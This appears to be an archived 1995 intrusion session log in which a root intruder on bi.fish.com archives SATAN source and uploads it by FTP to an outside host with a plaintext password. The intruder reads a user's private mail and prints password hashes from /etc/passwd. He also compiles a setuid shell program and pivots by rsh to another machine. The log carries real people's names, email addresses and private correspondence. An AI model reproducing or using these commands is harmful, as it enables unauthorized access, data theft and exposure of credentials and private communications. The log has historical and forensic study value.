Kevin On Demand
- Back To Fish For SATAN - kevin-on-demand.takedown.com 4019
- Start: 1995 Feb 11 22:07:28
- Total Run Time: 16:47
- From NETCOM-min1.netcom.net to netcom19.netcom.com.
- More explorations of Dan Farmer's machines. Steals a copy of SATAN, Dan's remote network security probing tool. Reads Dan's mail, looks for info on Tsutomu, Alec Muffett (author of Crack, a password-cracking program).
bi.fish.com# du
14 ./src/boot
125 ./src/port_scan
53 ./src/misc
193 ./src
14 ./satan-data
9 ./html/config
24 ./html/docs
15 ./html/dots
11 ./html/images
71 ./html/lines
2 ./html/reporting/140.174.97
16 ./html/reporting
150 ./html
4 ./sys
716 .
bi.fish.com# tar cf /tmp/satan.tar * &
[1] 22890
bi.fish.com# ls
Fixes infer_facts.pl rusers.satan
Makefile infer_todo.pl satan
Notes md5 satan-data
Redesign misc.pl satan.cf
bit_bucket nfs-chk.satan satan_support.pl
boot paths.pl showmount.satan
boot.satan policy-engine.pl socket.ph
dns.satan portscan-heavy.satan sort_facts.pl
drop_fact.pl portscan-normal.satan src
facts.pl rcmdinfo sys
finger.satan rex targets.pl
fix_hostname.pl rex.satan tcp_scan
ftp.satan rpc.satan tftp.satan
ftp2.satan rsh.satan timeout
get_host.pl rules.drop todo.pl
get_targets rules.facts udp_scan
getfqdn.pl rules.hosttype x.chk
hosttype.pl rules.ru x.satan
html rules.todo ypbind.satan
html-perl.pl run-satan.pl
[1] + Done tar cf /tmp/satan.tar *
bi.fish.com# cd src
bi.fish.com# ls
boot misc port_scan
bi.fish.com# ls -R
boot misc port_scan
boot:
Makefile boot.o bootparam.h
boot.c bootparam.c bootparam.o
misc:
Makefile md5.c md5c.o rex.c
global.h md5.h mdx.c timeout.c
md4.h md5.o mdx.h x.chk.c
md4c.c md5c.c rcmdinfo.c x.chk.o
port_scan:
README lib.h non_blocking.o ring.c udp_scan.c
error.c makefile open_limit.c ring.o udp_scan.o
error.o mallocs.c open_limit.o tcp_scan.1
find_addr.c mallocs.o print_data.c tcp_scan.c
find_addr.o non_blocking.c print_data.o tcp_scan.o
bi.fish.com# cd ..
bi.fish.com# ls
Fixes infer_facts.pl rusers.satan
Makefile infer_todo.pl satan
Notes md5 satan-data
Redesign misc.pl satan.cf
bit_bucket nfs-chk.satan satan_support.pl
boot paths.pl showmount.satan
boot.satan policy-engine.pl socket.ph
dns.satan portscan-heavy.satan sort_facts.pl
drop_fact.pl portscan-normal.satan src
facts.pl rcmdinfo sys
finger.satan rex targets.pl
fix_hostname.pl rex.satan tcp_scan
ftp.satan rpc.satan tftp.satan
ftp2.satan rsh.satan timeout
get_host.pl rules.drop todo.pl
get_targets rules.facts udp_scan
getfqdn.pl rules.hosttype x.chk
hosttype.pl rules.ru x.satan
html rules.todo ypbind.satan
html-perl.pl run-satan.pl
bi.fish.com# cd /tmp
bi.fish.com# compress satan* &
[1] 22895
bi.fish.com# ls
Re13494~ Re4546 man14356
#Re3558# Re6711 mttx120571
..swatch..1479 Text10850.0 ppp
..swatch..1832 Text10861.0 pppp
..swatch..2201 Text469.0 resend.360.in
..swatch..2239 Text488.0 resend.360.out
..swatch..6844 Text527.0 result
..swatch..6847 Text538.0 rex.14727
..swatch..6880 appr satan.tar
..swatch..6997 beat satan.tar.Z
..swatch..7115 croutCJBa00163 sendbug-tmp.29015
..swatch..7123 croutHOCa00171 sliplogin.logout.a00125
..swatch..8099 croutMJBa00163 sliplogin.logout.a00131
..swatch..8741 croutPOCa00159 sliplogin.logout.a00136
..swatch..8839 croutQECa00160 sliplogin.logout.a01162
..swatch..8870 croutWARa00179 snd.16467.bak
..swatch..8893 croutXNCa00171 tmp
..swatch..8977 dela tty.txt.a00206
..swatch..9019 doex3247 tty.txt.a00217
.NeWS-unix dusage.news tty.txt.a00469
.X11-unix emm.17216.138 tty.txt.a00488
.l2 est.7252 tty.txt.a00527
LCK..cua0 fhor tty.txt.a00538
Re14245 hak tty.txt.a10850
Re1815 idiot tty.txt.a10861
Re27153 log.313 winselection
Re3558 man14335
bi.fish.com# ls -tla | more
total 652
drwxrwsrwt 9 root 3072 Feb 11 22:13 .
-rw-r--r-- 1 root 310707 Feb 11 22:12 satan.tar.Z
-rw------- 1 root 0 Feb 11 22:00 croutQECa00160
drwxr-sr-x 21 root 1536 Feb 11 20:59 ..
-rw------- 1 sven 478 Feb 10 17:49 est.7252
-rw------- 1 sven 5385 Feb 9 17:11 emm.17216.138
-rwxr-xr-x 1 zen 1038 Feb 8 23:53 ..swatch..2239
-rwxr-xr-x 1 zen 1039 Feb 8 23:51 ..swatch..2201
-rwxr-xr-x 1 zen 1039 Feb 8 23:41 ..swatch..1832
-rwxr-xr-x 1 zen 933 Feb 8 23:29 ..swatch..1479
-rw------- 1 mike 0 Feb 8 22:21 Text488.0
-rw------- 1 mike 0 Feb 8 22:21 tty.txt.a00488
-rw------- 1 mike 0 Feb 8 22:21 Text469.0
-rw------- 1 mike 0 Feb 8 22:21 tty.txt.a00469
drwxrwsrwx 2 root 512 Feb 8 22:21 .X11-unix
drwxrwsrwx 2 root 512 Feb 8 22:21 .NeWS-unix
-rw-rw---- 1 root 4 Feb 8 21:56 LCK..cua0
-rw-rw-rw- 1 root 147 Feb 8 21:54 sliplogin.logout.a00136
-rw------- 1 mike 0 Feb 8 20:43 tty.txt.a00217
-rw------- 1 mike 0 Feb 8 20:43 tty.txt.a00206
-rw-rw-rw- 1 root 213 Feb 8 20:40 sliplogin.logout.a00131
[1] + Done compress satan*
bi.fish.com# cat *2239*
No match.
bi.fish.com# pwd
/tmp
bi.fish.com# ls -tla sat*
-rw-r--r-- 1 root 310707 Feb 11 22:12 satan.tar.Z
bi.fish.com# w
10:14pm up 3 days, 18 mins, 8 users, load average: 0.50, 0.18, 0.04
User tty login@ idle JCPU PCPU what
mike console Wed10pm 3days 21:15 21:13 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 10:37 29:53 1:03 xterm -fn 8x16
mike ttyp1 Wed10pm 18:45 7 7 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 25:59 2 -csh
mike ttyp4 Wed10pm 3days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 10:56 26 -rc
zen ttyp6 5:18pm 1:15 52 42 /usr/local/emacs/etc/wakeup 60
zen ttyp7 Wed11pm 13:53 -
muffy ttypa Thu 9am 10:53 25:16 14:16 telnet remarque.berkeley.edu
alyce ttypf Fri 4pm 27:15 33 -csh
bi.fish.com# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> mput satan*
mput satan.tar.Z? y
200 PORT command successful.
150 Binary data connection for satan.tar.Z (140.174.97.1,1033).
226 Transfer complete.
local: satan.tar.Z remote: satan.tar.Z
310707 bytes sent in 1.9e+02 seconds (1.6 Kbytes/s)
ftp> quit
221 Goodbye.
bi.fish.com# rm satan*
bi.fish.com# w
10:18pm up 3 days, 22 mins, 8 users, load average: 0.17, 0.18, 0.01
User tty login@ idle JCPU PCPU what
mike console Wed10pm 3days 21:15 21:13 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 10:41 29:53 1:03 xterm -fn 8x16
mike ttyp1 Wed10pm 18:49 7 7 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 26:03 2 -csh
mike ttyp4 Wed10pm 3days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 11:00 26 -rc
zen ttyp6 5:18pm 1:18 52 42 /usr/local/emacs/etc/wakeup 60
zen ttyp7 Wed11pm 13:57 -
muffy ttypa Thu 9am 10:57 25:16 14:16 telnet remarque.berkeley.edu
alyce ttypf Fri 4pm 27:19 33 -csh
bi.fish.com# ps -aux | grep dump &
[1] 22910 22911
root 22911 7.7 0.3 32 192 p2 S 22:18 0:00 grep dump
[1] Done ps -aux | grep dump
bi.fish.com# cd /usr/spool/mail
bi.fish.com# ls -tla zen
-rw------- 1 zen 882926 Feb 11 20:54 zen
bi.fish.com# grep -i tsu z
grep: z: No such file or directory
bi.fish.com# grep -i alec zen
From Alec.Muffett@UK.Sun.COM Mon Jan 23 06:54:09 1995
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
- alec
From Alec.Muffett@UK.Sun.COM Tue Jan 24 06:12:41 1995
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
- alec
From Alec.Muffett@UK.Sun.COM Thu Feb 9 15:52:04 1995
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
- alec
bi.fish.com# more z
z: No such file or directory
bi.fish.com# more zen
From MATT_H@bcs.utmb.edu Thu Jan 19 18:07:26 1995
Received: from beach.utmb.edu (beach.utmb.edu [129.109.1.207]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with ESMTP id SAA20186 for <majordomo-owner@fish.com>; Thu, 19 Jan 1995 18:07:21 -0800
From: MATT_H@bcs.utmb.edu
Received: from bcs.utmb.edu by BEACH.UTMB.EDU (PMDF V4.3-10 #7754) id <01HM1JVNNJOW00E1OT@BEACH.UTMB.EDU>; Thu, 19 Jan 1995 19:59:23 -0500 (CDT)
Received: from BCSSERVER/E-MAIL by bcs.utmb.edu (Mercury 1.13); Thu, 19 Jan 95 19:54:13 CST
Received: from E-MAIL by BCSSERVER (Mercury 1.13); Thu, 19 Jan 95 19:54:05 CST
Date: Thu, 19 Jan 1995 21:06:47 -0600 (CST)
Subject: digest query
To: majordomo-owner@fish.com
Message-id: <42B84522A@bcs.utmb.edu>
Organization: University of Texas Medical Branch
X-Mailer: Pegasus Mail/Mac (v2.1 pre-release)
Content-transfer-encoding: 7BIT
Priority: A
Status: O
Howdy--
/lec
...skipping
The key part of the research at the moment is to define the structure of the
database (e.g., what to collect, what to index). I'm trying to drive this as
a good software engineering effort, and have asked one student involved to
come up with sample queries he expects people to make on this database. Once
we know some expected queries, we can design the database to be able to
respond to them.
Enclosed is his pass at sample questions. Can you think of any that you might
want to ask that are not in this list? if so, please send 'em on to me so we
can be sure they are addressed in the design.
(Also, if you have data you are willing to contribute to the database once we
get it cranked up, let me know that too.)
Thanks!
--spaf
------- Forwarded Message
From: aslam (Taimur Aslam)
/Alec
...skipping
From Alec.Muffett@UK.Sun.COM Mon Jan 23 06:54:09 1995
Received: from Sun.COM (Sun.COM [192.9.9.1]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with SMTP id GAA14194 for <zen@fish.com>; Mon, 23 Jan 1995 06:54:03 -0800
Received: from snail.Sun.COM ([129.145.1.3]) by Sun.COM (sun-barr.Sun.COM)
id AA17009; Mon, 23 Jan 95 06:49:23 PST
Received: from UK.Sun.COM (sunuk) by snail.Sun.COM (4.1/SMI-4.1)
id AA04937; Mon, 23 Jan 95 06:49:21 PST
Received: from bagsun.UK.Sun.COM by UK.Sun.COM (4.1/SMI-4.1e-UK)
id AA02962; Mon, 23 Jan 95 14:49:19 GMT
Received: from coyote.UK.Sun.COM by bagsun.UK.Sun.COM (5.0/SMI-5.0-sec(uk - sec)
)
id AA20823; Mon, 23 Jan 1995 14:49:17 GMT
Received: by coyote.UK.Sun.COM (5.x/SMI-5.0-sub(uk - sub))
id AA21363; Mon, 23 Jan 1995 14:50:16 GMT
Date: Mon, 23 Jan 1995 14:50:16 GMT
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
Message-Id: <9501231450.AA21363@coyote.UK.Sun.COM>
To: zen@fish.com
Subject: hi....
X-Sun-Charset: US-ASCII
Content-Length: 185
Status: OR
Dan,
I'm tenatively meeting Shabbir (+ his partner) at Nelson's Column, Sautrday,
at 1pm in the afternoon.
Does this fit in with your schedule ?
What *is* your schedule ?
- alec
From muffy Mon Jan 23 07:52:40 1995
Received: (from muffy@localhost) by bi.fish.com (8.9.1 (Alpha)/1.0.23) id HAA14956; Mon, 23 Jan 1995 07:52:39 -0800
Date: Mon, 23 Jan 1995 07:52:39 -0800
From: Muffy <muffy>
Message-Id: <199501231552.HAA14956@bi.fish.com>
/
...skipping
------------------------------
From Alec.Muffett@UK.Sun.COM Tue Jan 24 06:12:41 1995
Received: from Sun.COM (Sun.COM [192.9.9.1]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with SMTP id GAA02929 for <zen@bi.fish.com> Tue, 24 Jan 1995 06:12:35 -0800
Received: from snail.Sun.COM ([129.145.1.3]) by Sun.COM (sun-barr.Sun.COM)
id AA02453; Tue, 24 Jan 95 06:07:42 PST
Received: from UK.Sun.COM (sunuk) by snail.Sun.COM (4.1/SMI-4.1)
id AA09561; Tue, 24 Jan 95 06:07:39 PST
Received: from bagsun.UK.Sun.COM by UK.Sun.COM (4.1/SMI-4.1e-UK)
id AA23012; Tue, 24 Jan 95 14:07:36 GMT
Received: from coyote.UK.Sun.COM by bagsun.UK.Sun.COM (5.0/SMI-5.0-sec(uk - sec)
)
id AA06688; Tue, 24 Jan 1995 14:07:34 GMT
Received: by coyote.UK.Sun.COM (5.x/SMI-5.0-sub(uk - sub))
id AA16503; Tue, 24 Jan 1995 14:08:34 GMT
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
Message-Id: <9501241408.AA16503@coyote.UK.Sun.COM>
Subject: Re: damn...
To: zen@bi.fish.com
Date: Tue, 24 Jan 1995 14:08:34 +0000 (GMT)
In-Reply-To: <199501241034.CAA00580@bi.fish.com> from "zen@bi.fish.com" at Jan 2
4, 95 02:34:22 am
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Content-Length: 1271
Status: OR
>I meant to cc you; sorry... I just found out that access1.sun.com
>has the old sendmail bug (telnet to port 7002 for some fun); I
>mailed flowe, brad, and tomk about it, but they probably aren't
>up at this time :-) As I told them, I told sun long ago that
>they shouldn't run sendmail on hosts that don't need it...
>this is what hpapens.
Indeed. I can't get anything out of that port, and am in no position
to fix it (my token's out of action until my database entry gets
updated.)
You know the group's expanded ? We've currently got:
Me
Brad
Ken
Tim Murphy
Karen Casella
Karen Doby (manager)
50% Ran-Chi Huang in Singapore
50% Fred Lowe, more as time progresses
Judy Delgado
- and we're making an offer to someone in Holland 8->
The group's moved to MTV02 now; I will be in SFO in a couple of weeks,
so maybe we can have a return visit then.
>I used an old sendmail break script that makes a port usable in
>this fashion; you probably have it, but I'd be happy to send it to
>ya... I only checked that one host on your firewall (long story :-))
Which bug, the "bounce through a Errors-To:" one, or older than that ?
>The 1pm thing saturday sounds cool to me, btw..
Goodo - I'll mail out a confirmation to you/shabby tomorrow.
- alec
From muffy Tue Jan 24 07:31:49 1995
Received: (from muffy@localhost) by bi.fish.com (8.9.1 (Alpha)/1.0.23) id HAA03857; Tue, 24 Jan 1995 07:31:49 -0800
Date: Tue, 24 Jan 1995 07:31:49 -0800
From: Muffy <muffy>
Message-Id: <199501241531.HAA03857@bi.fish.com>
To: zen
In-reply-to: <zen>'s message of Tue, 24 Jan 1995 01:00:21 -0800 <199501240900.BAA29799@bi.fish.com>
Subject: Re: systers
Organization: Vicious Fishes
X-Meaningful-Quote: Oh, wow, look at the moon.
Status: ORr
> What is the address of the systers mailing list?
/
...skipping
Privacy through probable primes ## PGP public key available on request
From Alec.Muffett@UK.Sun.COM Thu Feb 9 15:52:04 1995
Received: from Sun.COM (Sun.COM [192.9.9.1]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with SMTP id PAA15928 for <zen@fish.com>; Thu, 9 Feb 1995 15:51:47 -0800
Received: from snail.Sun.COM ([129.145.1.3]) by Sun.COM (sun-barr.Sun.COM)
id AA00251; Thu, 9 Feb 95 15:46:34 PST
Received: from UK.Sun.COM (sunuk) by snail.Sun.COM (4.1/SMI-4.1)
id AA06229; Thu, 9 Feb 95 15:46:31 PST
Received: from bagsun.UK.Sun.COM by UK.Sun.COM (4.1/SMI-4.1e-UK)
id AA17635; Thu, 9 Feb 95 23:46:22 GMT
Received: from coyote.UK.Sun.COM by bagsun.UK.Sun.COM (5.0/SMI-5.0-sec(uk - sec)
)
id AA12729; Thu, 9 Feb 1995 23:46:18 GMT
Received: by coyote.UK.Sun.COM (5.x/SMI-5.0-sub(uk - sub))
id AA26366; Thu, 9 Feb 1995 23:47:24 GMT
Date: Thu, 9 Feb 1995 23:47:24 GMT
From: Alec.Muffett@UK.Sun.COM (Alec Muffett)
Message-Id: <9502092347.AA26366@coyote.UK.Sun.COM>
To: whitfield.diffie@eng.Sun.COM, zen@death.corp.sgi.com, zen@fish.com
Subject: regrets
ontent-Length: 384
Status: OR
guys, I'm having trouble coping in california; call it homesickness or
whatnot, with regret I'm not going to stay over on Saturday PM, but will
fly out Saturday 11am-ish.
if you're free or available sometime friday, I'd love to split
lunch/dinner with you, but if not, then I wish you all the best and'll
see you next time I'm over.
Drop me a mail if you have time/ideas.
- alec
From triples-owner@hal.com Fri Feb 10 11:06:44 1995
Received: from hal.com (hal.COM [192.88.244.33]) by bi.fish.com (8.9.1 (Alpha)/1.0.23) with SMTP id LAA29618 for <zen@bi.fish.com>; Fri, 10 Feb 1995 11:06:40 -0800
Resent-From: triples-owner@hal.com
Received: by hal.com (4.1/SMI-4.1.1)
/
Pattern not found
q
bi.fish.com# grep 0-i
^C
bi.fish.com# grep -i sdsc zen
Path: bi.fish.com!x15.pilot.net!news.sprintlink.net!redstone.interpath.net!dd
sw1!news.kei.com!yeshua.marcam.com!charnel.ecst.csuchico.edu!nic-nac.CSU.net!gop
her.sdsc.edu!acsc.com!wp-sp.nba.trw.com!newswire.sp.trw.com!shoffman.sdd.trw.com
!user
bi.fish.com# grep -i hack z
grep: z: No such file or directory
bi.fish.com# cd /home
bi.fish.com# ls
add cheryl kay man suki
alpha elijah knuckles mcb sven
alyce fair lear mike tanais
annaliza foo lefty muffy tracey
asp ftp limell norman tsutomu
asya goddess liz nyar wayne
bizarro-zen henry lizd phoenix wietse
black home-dir-dusage llew scorpia zen
bpowell jkevin local share
bson jym local.old smd
cat kata lost+found staff
bi.fish.com# cd wietse
bi.fish.com# ls t-la | head
t-la not found
bi.fish.com# ls -tla | head
total 880
drwxr-sr-x 52 tracey 1024 Feb 10 09:12 ..
drwxr-xr-x 2 wietse 2048 Jan 8 12:55 tcp_wrappers_7.0
drwxr-xr-x 24 wietse 1536 Jan 8 12:53 .
drwxr-xr-x 2 wietse 2048 Jan 2 14:30 tcp_wrappers_7.0beta
-rw-r--r-- 1 wietse 91061 Jan 2 14:12 tcp_wrappers_7.0beta.tar.gz
drwxr-xr-x 7 wietse 1024 Apr 28 1994 satan
drwx------ 2 wietse 1024 Apr 22 1994 Mail
-rw------- 1 wietse 1555 Apr 21 1994 s=guido
-rw------- 1 wietse 966 Apr 21 1994 1
bi.fish.com# ps
PID TT STAT TIME COMMAND
137 cu IW 0:00 /usr/local/etc/sliplogin Slg
22871 p2 IW 0:00 sh
22872 p2 S 0:00 -bin/csh (csh)
22962 p2 R 0:00 ps
22261 p6 IW 0:00 -su (csh)
22262 p6 IW 0:01 bash
bi.fish.com# w
10:21pm up 3 days, 26 mins, 8 users, load average: 0.14, 0.11, 0.00
User tty login@ idle JCPU PCPU what
mike console Wed10pm 3days 21:15 21:13 mailtool -Wp 30 30 -Ws 585 281 -
mike ttyp0 Wed10pm 10:45 29:53 1:03 xterm -fn 8x16
mike ttyp1 Wed10pm 18:52 7 7 -usr/local/bin/tcsh
mike ttyp3 Thu 8am 26:06 2 -csh
mike ttyp4 Wed10pm 3days -usr/local/bin/tcsh
smd ttyp5 Thu11pm 11:04 26 -rc
zen ttyp6 5:18pm 1:22 52 42 /usr/local/emacs/etc/wakeup 60
zen ttyp7 Wed11pm 14:01 -
muffy ttypa Thu 9am 11:00 25:16 14:16 telnet remarque.berkeley.edu
alyce ttypf Fri 4pm 27:23 33 -csh
bi.fish.com# more /etc/hosts
#
# Host Database
#
# If the NIS is running, this file is only consulted when booting
#
127.0.0.1 localhost
# subnet: 140.174.97.xx.
# gateway, etc.
140.174.97.1 bi bi-ether loghost mailhost fish.com bi.fish.com bi-slip
140.174.97.2 wet
140.174.97.3 floating-upside-down-in-the-water fud
140.174.97.4 dead
140.174.97.35 tuna
140.174.97.66 scum-sucker
140.174.97.69 filet-o
# sgi box
140.174.97.200 blow
q
bi.fish.com# ping wet
ping: Command not found.
bi.fish.com# cd /usr/etc
bi.fish.com# ping wet
wet is alive
bi.fish.com# ping dead
ping tuna
ping scum-sucker
ping filet-o
no answer from dead
grep zen /etc/passwd
cd /tmp
ed c.c
a
main () {
no answer from tuna
no answer from scum-sucker
no answer from filet-o
zen:zoSklRTgkSoms:13:0: :/home/zen:/bin/bashbizarro:*:14:0::/home/bizarro-zen:/bin/bash
?c.c: No such file or directory
setuid(13);
setgid(0);
execl("/bin/sh", "sh", 0);
}
.
w
q
62
bi.fish.com# cc c.c
bi.fish.com# rm a
rm: a: No such file or directory
bi.fish.com# rm c.c
bi.fish.com# ./a.out
$ rsh wet /bin/csh -bif
Warning: no access to tty; thus no job control in this shell...
wet% w
10:19pm up 4 days, 23:12, 3 users, load average: 0.72, 0.46, 0.22
User tty login@ idle JCPU PCPU what
muffy console Mon11pm 5days 45:56 43:48 /usr/openwin/bin/cm
muffy ttyp0 Mon11pm 11:03 25 21 telnet bi
muffy ttyp1 Mon11pm 1:22 20 -sh
muffy ttyp2 Mon11pm 13:31 47 45 bash
wet% df
Filesystem kbytes used avail capacity Mounted on
/dev/sd0a 14983 9099 4386 67% /
/dev/sd0g 183198 165068 0 100% /usr
/dev/sd0h 383838 54614 290841 16% /wet
wet% pwd
/home/zen
wet% ls -tla
total 3265
drwxrwsrwx 6 zen 1024 Feb 4 15:35 .
-rw-r--r-- 1 zen 7143 Feb 4 15:35 .bashrc
-rw-r--r-- 1 zen 1110 Feb 4 15:35 .bash_profile
-rw------- 1 zen 25397 Feb 3 23:07 jap
drwxr-sr-x 4 root 512 Feb 3 21:50 ..
-rw-r--r-- 1 root 2333571 Jan 6 00:14 thesis.ps
-rw------- 1 zen 131233 Jan 2 16:06 doc.txt
-rw-rw-rw- 1 zen 0 Dec 31 14:18 .bash_history
-rw------- 1 zen 6254 Dec 22 14:37 polyrules
-rw------- 1 zen 1456 Dec 20 14:37 .muffy-gifts
-rw------- 1 zen 241 Dec 2 17:03 invoice
-rw------- 1 zen 217 Nov 30 11:19 invoice.ps
-rw------- 1 zen 1032 Nov 29 14:16 foobard.foo
drwxr-sr-x 5 zen 512 Nov 25 21:01 src
drwxr-sr-x 2 zen 512 Nov 22 01:40 doc
-rw-r--r-- 1 root 3945 Nov 22 01:40 config.txt
-rwxr-xr-x 1 zen 286720 Nov 22 01:34 pgp262
-r-------- 1 zen 0 Nov 21 20:18 .xnews.wet:0
-rwxr-xr-x 1 zen 163840 Nov 21 16:54 pgptelnet
-rwxr-xr-x 1 zen 253952 Nov 21 14:08 pgp
-rw-r--r-- 1 zen 497 Nov 21 14:07 secring.pgp
-rw-r--r-- 1 zen 10537 Nov 21 14:07 pubring.pgp
drwxr-sr-x 3 zen 512 Mar 11 1994 satan
-rw------- 1 zen 51966 Mar 11 1994 PAPER
-rw------- 1 zen 146 Mar 7 1994 .Xauthority
drwxrwsrwx 2 zen 512 Feb 16 1994 .wastebasket
wet% more jap^C
wet% head jap
>From watson@wink.corp.sgi.com Fri Feb 3 14:04:12 1995
Received: from wink.corp.sgi.com by death.corp.sgi.com via ESMTP (940816.SGI.8.6.9/930416.SGI)
for <zen@death.corp.sgi.com> id OAA01539; Fri, 3 Feb 1995 14:04:11 -0800
Received: from localhost by wink.corp.sgi.com via SMTP (940816.SGI.8.6.9/940406.SGI)
id OAA24733; Fri, 3 Feb 1995 14:04:09 -0800
Message-Id: <199502032204.OAA24733@wink.corp.sgi.com>
To: zen@wink.corp.sgi.com, lear@wink.corp.sgi.com
Subject: ["Hideki Sakai": Re: Status(number) of accsess to Silicon-Surf from Japan]
Date: Fri, 03 Feb 95 14:04:09 -0800
From: David Watson <watson@wink.corp.sgi.com>
wet% grep -i ject jap
Subject: ["Hideki Sakai": Re: Status(number) of accsess to Silicon-Surf from Japan]
Subject: Re: Status(number) of accsess to Silicon-Surf from Japan
> Subject: NSG FireWall for Internet&other service
Subject: Re: Communication
Subject: Re: Communication
wet% tail -50 jap
Date: Fri, 03 Feb 95 14:14:39 -0800
From: David Watson <watson@wink.corp.sgi.com>
Subject: Re: Communication
Apparently-To: <zen>
Status: R
------- Blind-Carbon-Copy
To: ymo@figaro.nsg.sgi.com (Hide Motomatsu <ymo@nsg.sgi.com>)
Subject: Re: Communication
In-reply-to: Your message of "Wed, 01 Feb 95 13:55:47 +0900." <9502011355.ZM6793@figaro.nsg.sgi.com>
Date: Fri, 03 Feb 95 14:14:39 -0800
From: David Watson <watson@wink.corp.sgi.com>
Hi Hide-san!
Thanks for your messages. I've met with Jiro Matusubayashi and Hideki
Sakai about the plans for updating the WWW server connected to IIJ. At
our meeting I believe we found a way to address the requirements while
deferring the firewall installation until the alternative method was
found to be inadequate, but more recent mail messages indicate that the
plan to install a firewall will be done more quickly.
I want to be sure you receive the service you need to run your business,
and I also want to ensure the continued safety of SGI's information in
our corporate networks in a cost-effective way. I recommend delaying
the firewall installation as long as possible, since it is both
expensive and potentially threatening to security, but if there is a
true requirement to install one soon, I will be happy to involve my team
to help make it trouble-free.
I have forwarded Sakai-san's message to Eliot Lear and our new senior
security expert, Dan Farmer, and we will all work with your team to ensure
success in your WWW work, whatever the appropriate solution turns out to be.
I'll ask Dan to examine your plans in detail and work with yourself and
Sakai-san to develop and implement a plan of action.
Hope to see you again soon,
Thanks,
-David.
------- End of Blind-Carbon-Copy
wet% grep -i ject z
grep: z: No such file or directory
wet% grep -i ject jap
Subject: ["Hideki Sakai": Re: Status(number) of accsess to Silicon-Surf from Japan]
Subject: Re: Status(number) of accsess to Silicon-Surf from Japan
> Subject: NSG FireWall for Internet&other service
Subject: Re: Communication
Subject: Re: Communication
wet% ls -tla | more
total 3265
drwxrwsrwx 6 zen 1024 Feb 4 15:35 .
-rw-r--r-- 1 zen 7143 Feb 4 15:35 .bashrc
-rw-r--r-- 1 zen 1110 Feb 4 15:35 .bash_profile
-rw------- 1 zen 25397 Feb 3 23:07 jap
drwxr-sr-x 4 root 512 Feb 3 21:50 ..
-rw-r--r-- 1 root 2333571 Jan 6 00:14 thesis.ps
-rw------- 1 zen 131233 Jan 2 16:06 doc.txt
-rw-rw-rw- 1 zen 0 Dec 31 14:18 .bash_history
-rw------- 1 zen 6254 Dec 22 14:37 polyrules
-rw------- 1 zen 1456 Dec 20 14:37 .muffy-gifts
-rw------- 1 zen 241 Dec 2 17:03 invoice
-rw------- 1 zen 217 Nov 30 11:19 invoice.ps
-rw------- 1 zen 1032 Nov 29 14:16 foobard.foo
drwxr-sr-x 5 zen 512 Nov 25 21:01 src
drwxr-sr-x 2 zen 512 Nov 22 01:40 doc
-rw-r--r-- 1 root 3945 Nov 22 01:40 config.txt
-rwxr-xr-x 1 zen 286720 Nov 22 01:34 pgp262
-r-------- 1 zen 0 Nov 21 20:18 .xnews.wet:0
-rwxr-xr-x 1 zen 163840 Nov 21 16:54 pgptelnet
-rwxr-xr-x 1 zen 253952 Nov 21 14:08 pgp
-rw-r--r-- 1 zen 497 Nov 21 14:07 secring.pgp
-rw-r--r-- 1 zen 10537 Nov 21 14:07 pubring.pgp
drwxr-sr-x 3 zen 512 Mar 11 1994 satan
-rw------- 1 zen 51966 Mar 11 1994 PAPER
-rw------- 1 zen 146 Mar 7 1994 .Xauthority
drwxrwsrwx 2 zen 512 Feb 16 1994 .wastebasket
wet% ^C
wet% ls src
src
news
nfs
x
wet% cd src
wet% ls
news
nfs
x
wet% ls t-la x nfs
t-la not found
nfs:
c.c
nfs
nis
selsvc
x:
xsok31
wet% cd x
wet% ls -tla
total 3
drwxr-sr-x 3 zen 512 Nov 25 21:02 .
drwxr-sr-x 5 zen 512 Nov 25 21:01 ..
drwxr-sr-x 6 zen 1024 Mar 11 1994 xsok31
wet% cd x*
wet% ls
FILES
Imakefile
MANIFEST
Makefile
Makefile.bak
README
a.out
bitmaps
config.h
config_local.h
defaults.h
display.c
errors.h
externs.h
globals.h
help.h
libXpm.a
main.c
options.h
patchlevel.h
play.c
resources.c
save.c
saves
score.c
scoredisp.c
scores
screen.c
screens
xpm.h
xpmP.h
xsokoban.man
wet% w
10:22pm up 4 days, 23:15, 3 users, load average: 0.40, 0.42, 0.23
User tty login@ idle JCPU PCPU what
muffy console Mon11pm 5days 46:00 43:52 /usr/openwin/bin/cm
muffy ttyp0 Mon11pm 11:06 25 21 telnet bi
muffy ttyp1 Mon11pm 1:25 20 -sh
muffy ttyp2 Mon11pm 13:34 47 45 bash
wet% cat /etc/passwd
root:IWHonsvv5coI6:0:1:our lord and master:/:/bin/csh
daemon:*:1:1::/:/bin/false
bin:*:3:3::/:/bin/bash
zen:h6IKVcQKl7ZYY:13:0: :/home/zen:/bin/bash
muffy:1ExztCTLhXUYY:35:0:Muffy:/home/muffy:/bin/csh
wet% /usr/lib/makekey
zen17mufh6
h6zVjGOzrHJHw
wet% ls /usr/spool/mail
wet% ls -tla
total 339
drwxr-sr-x 3 zen 512 Nov 25 21:02 ..
drwxr-sr-x 6 zen 1024 Mar 11 1994 .
-rwx------ 1 zen 114688 Mar 11 1994 a.out
-rw-r--r-- 1 zen 7207 Mar 11 1994 xpmP.h
-rw-r--r-- 1 zen 12048 Mar 11 1994 xpm.h
-rw-r--r-- 1 zen 2111 Mar 11 1994 Makefile.bak
-rw-r--r-- 1 zen 7271 Mar 11 1994 xsokoban.man
drwxr-sr-x 2 zen 2048 Mar 11 1994 screens
-rw-r--r-- 1 zen 1494 Mar 11 1994 screen.c
drwxr-sr-x 2 zen 512 Mar 11 1994 scores
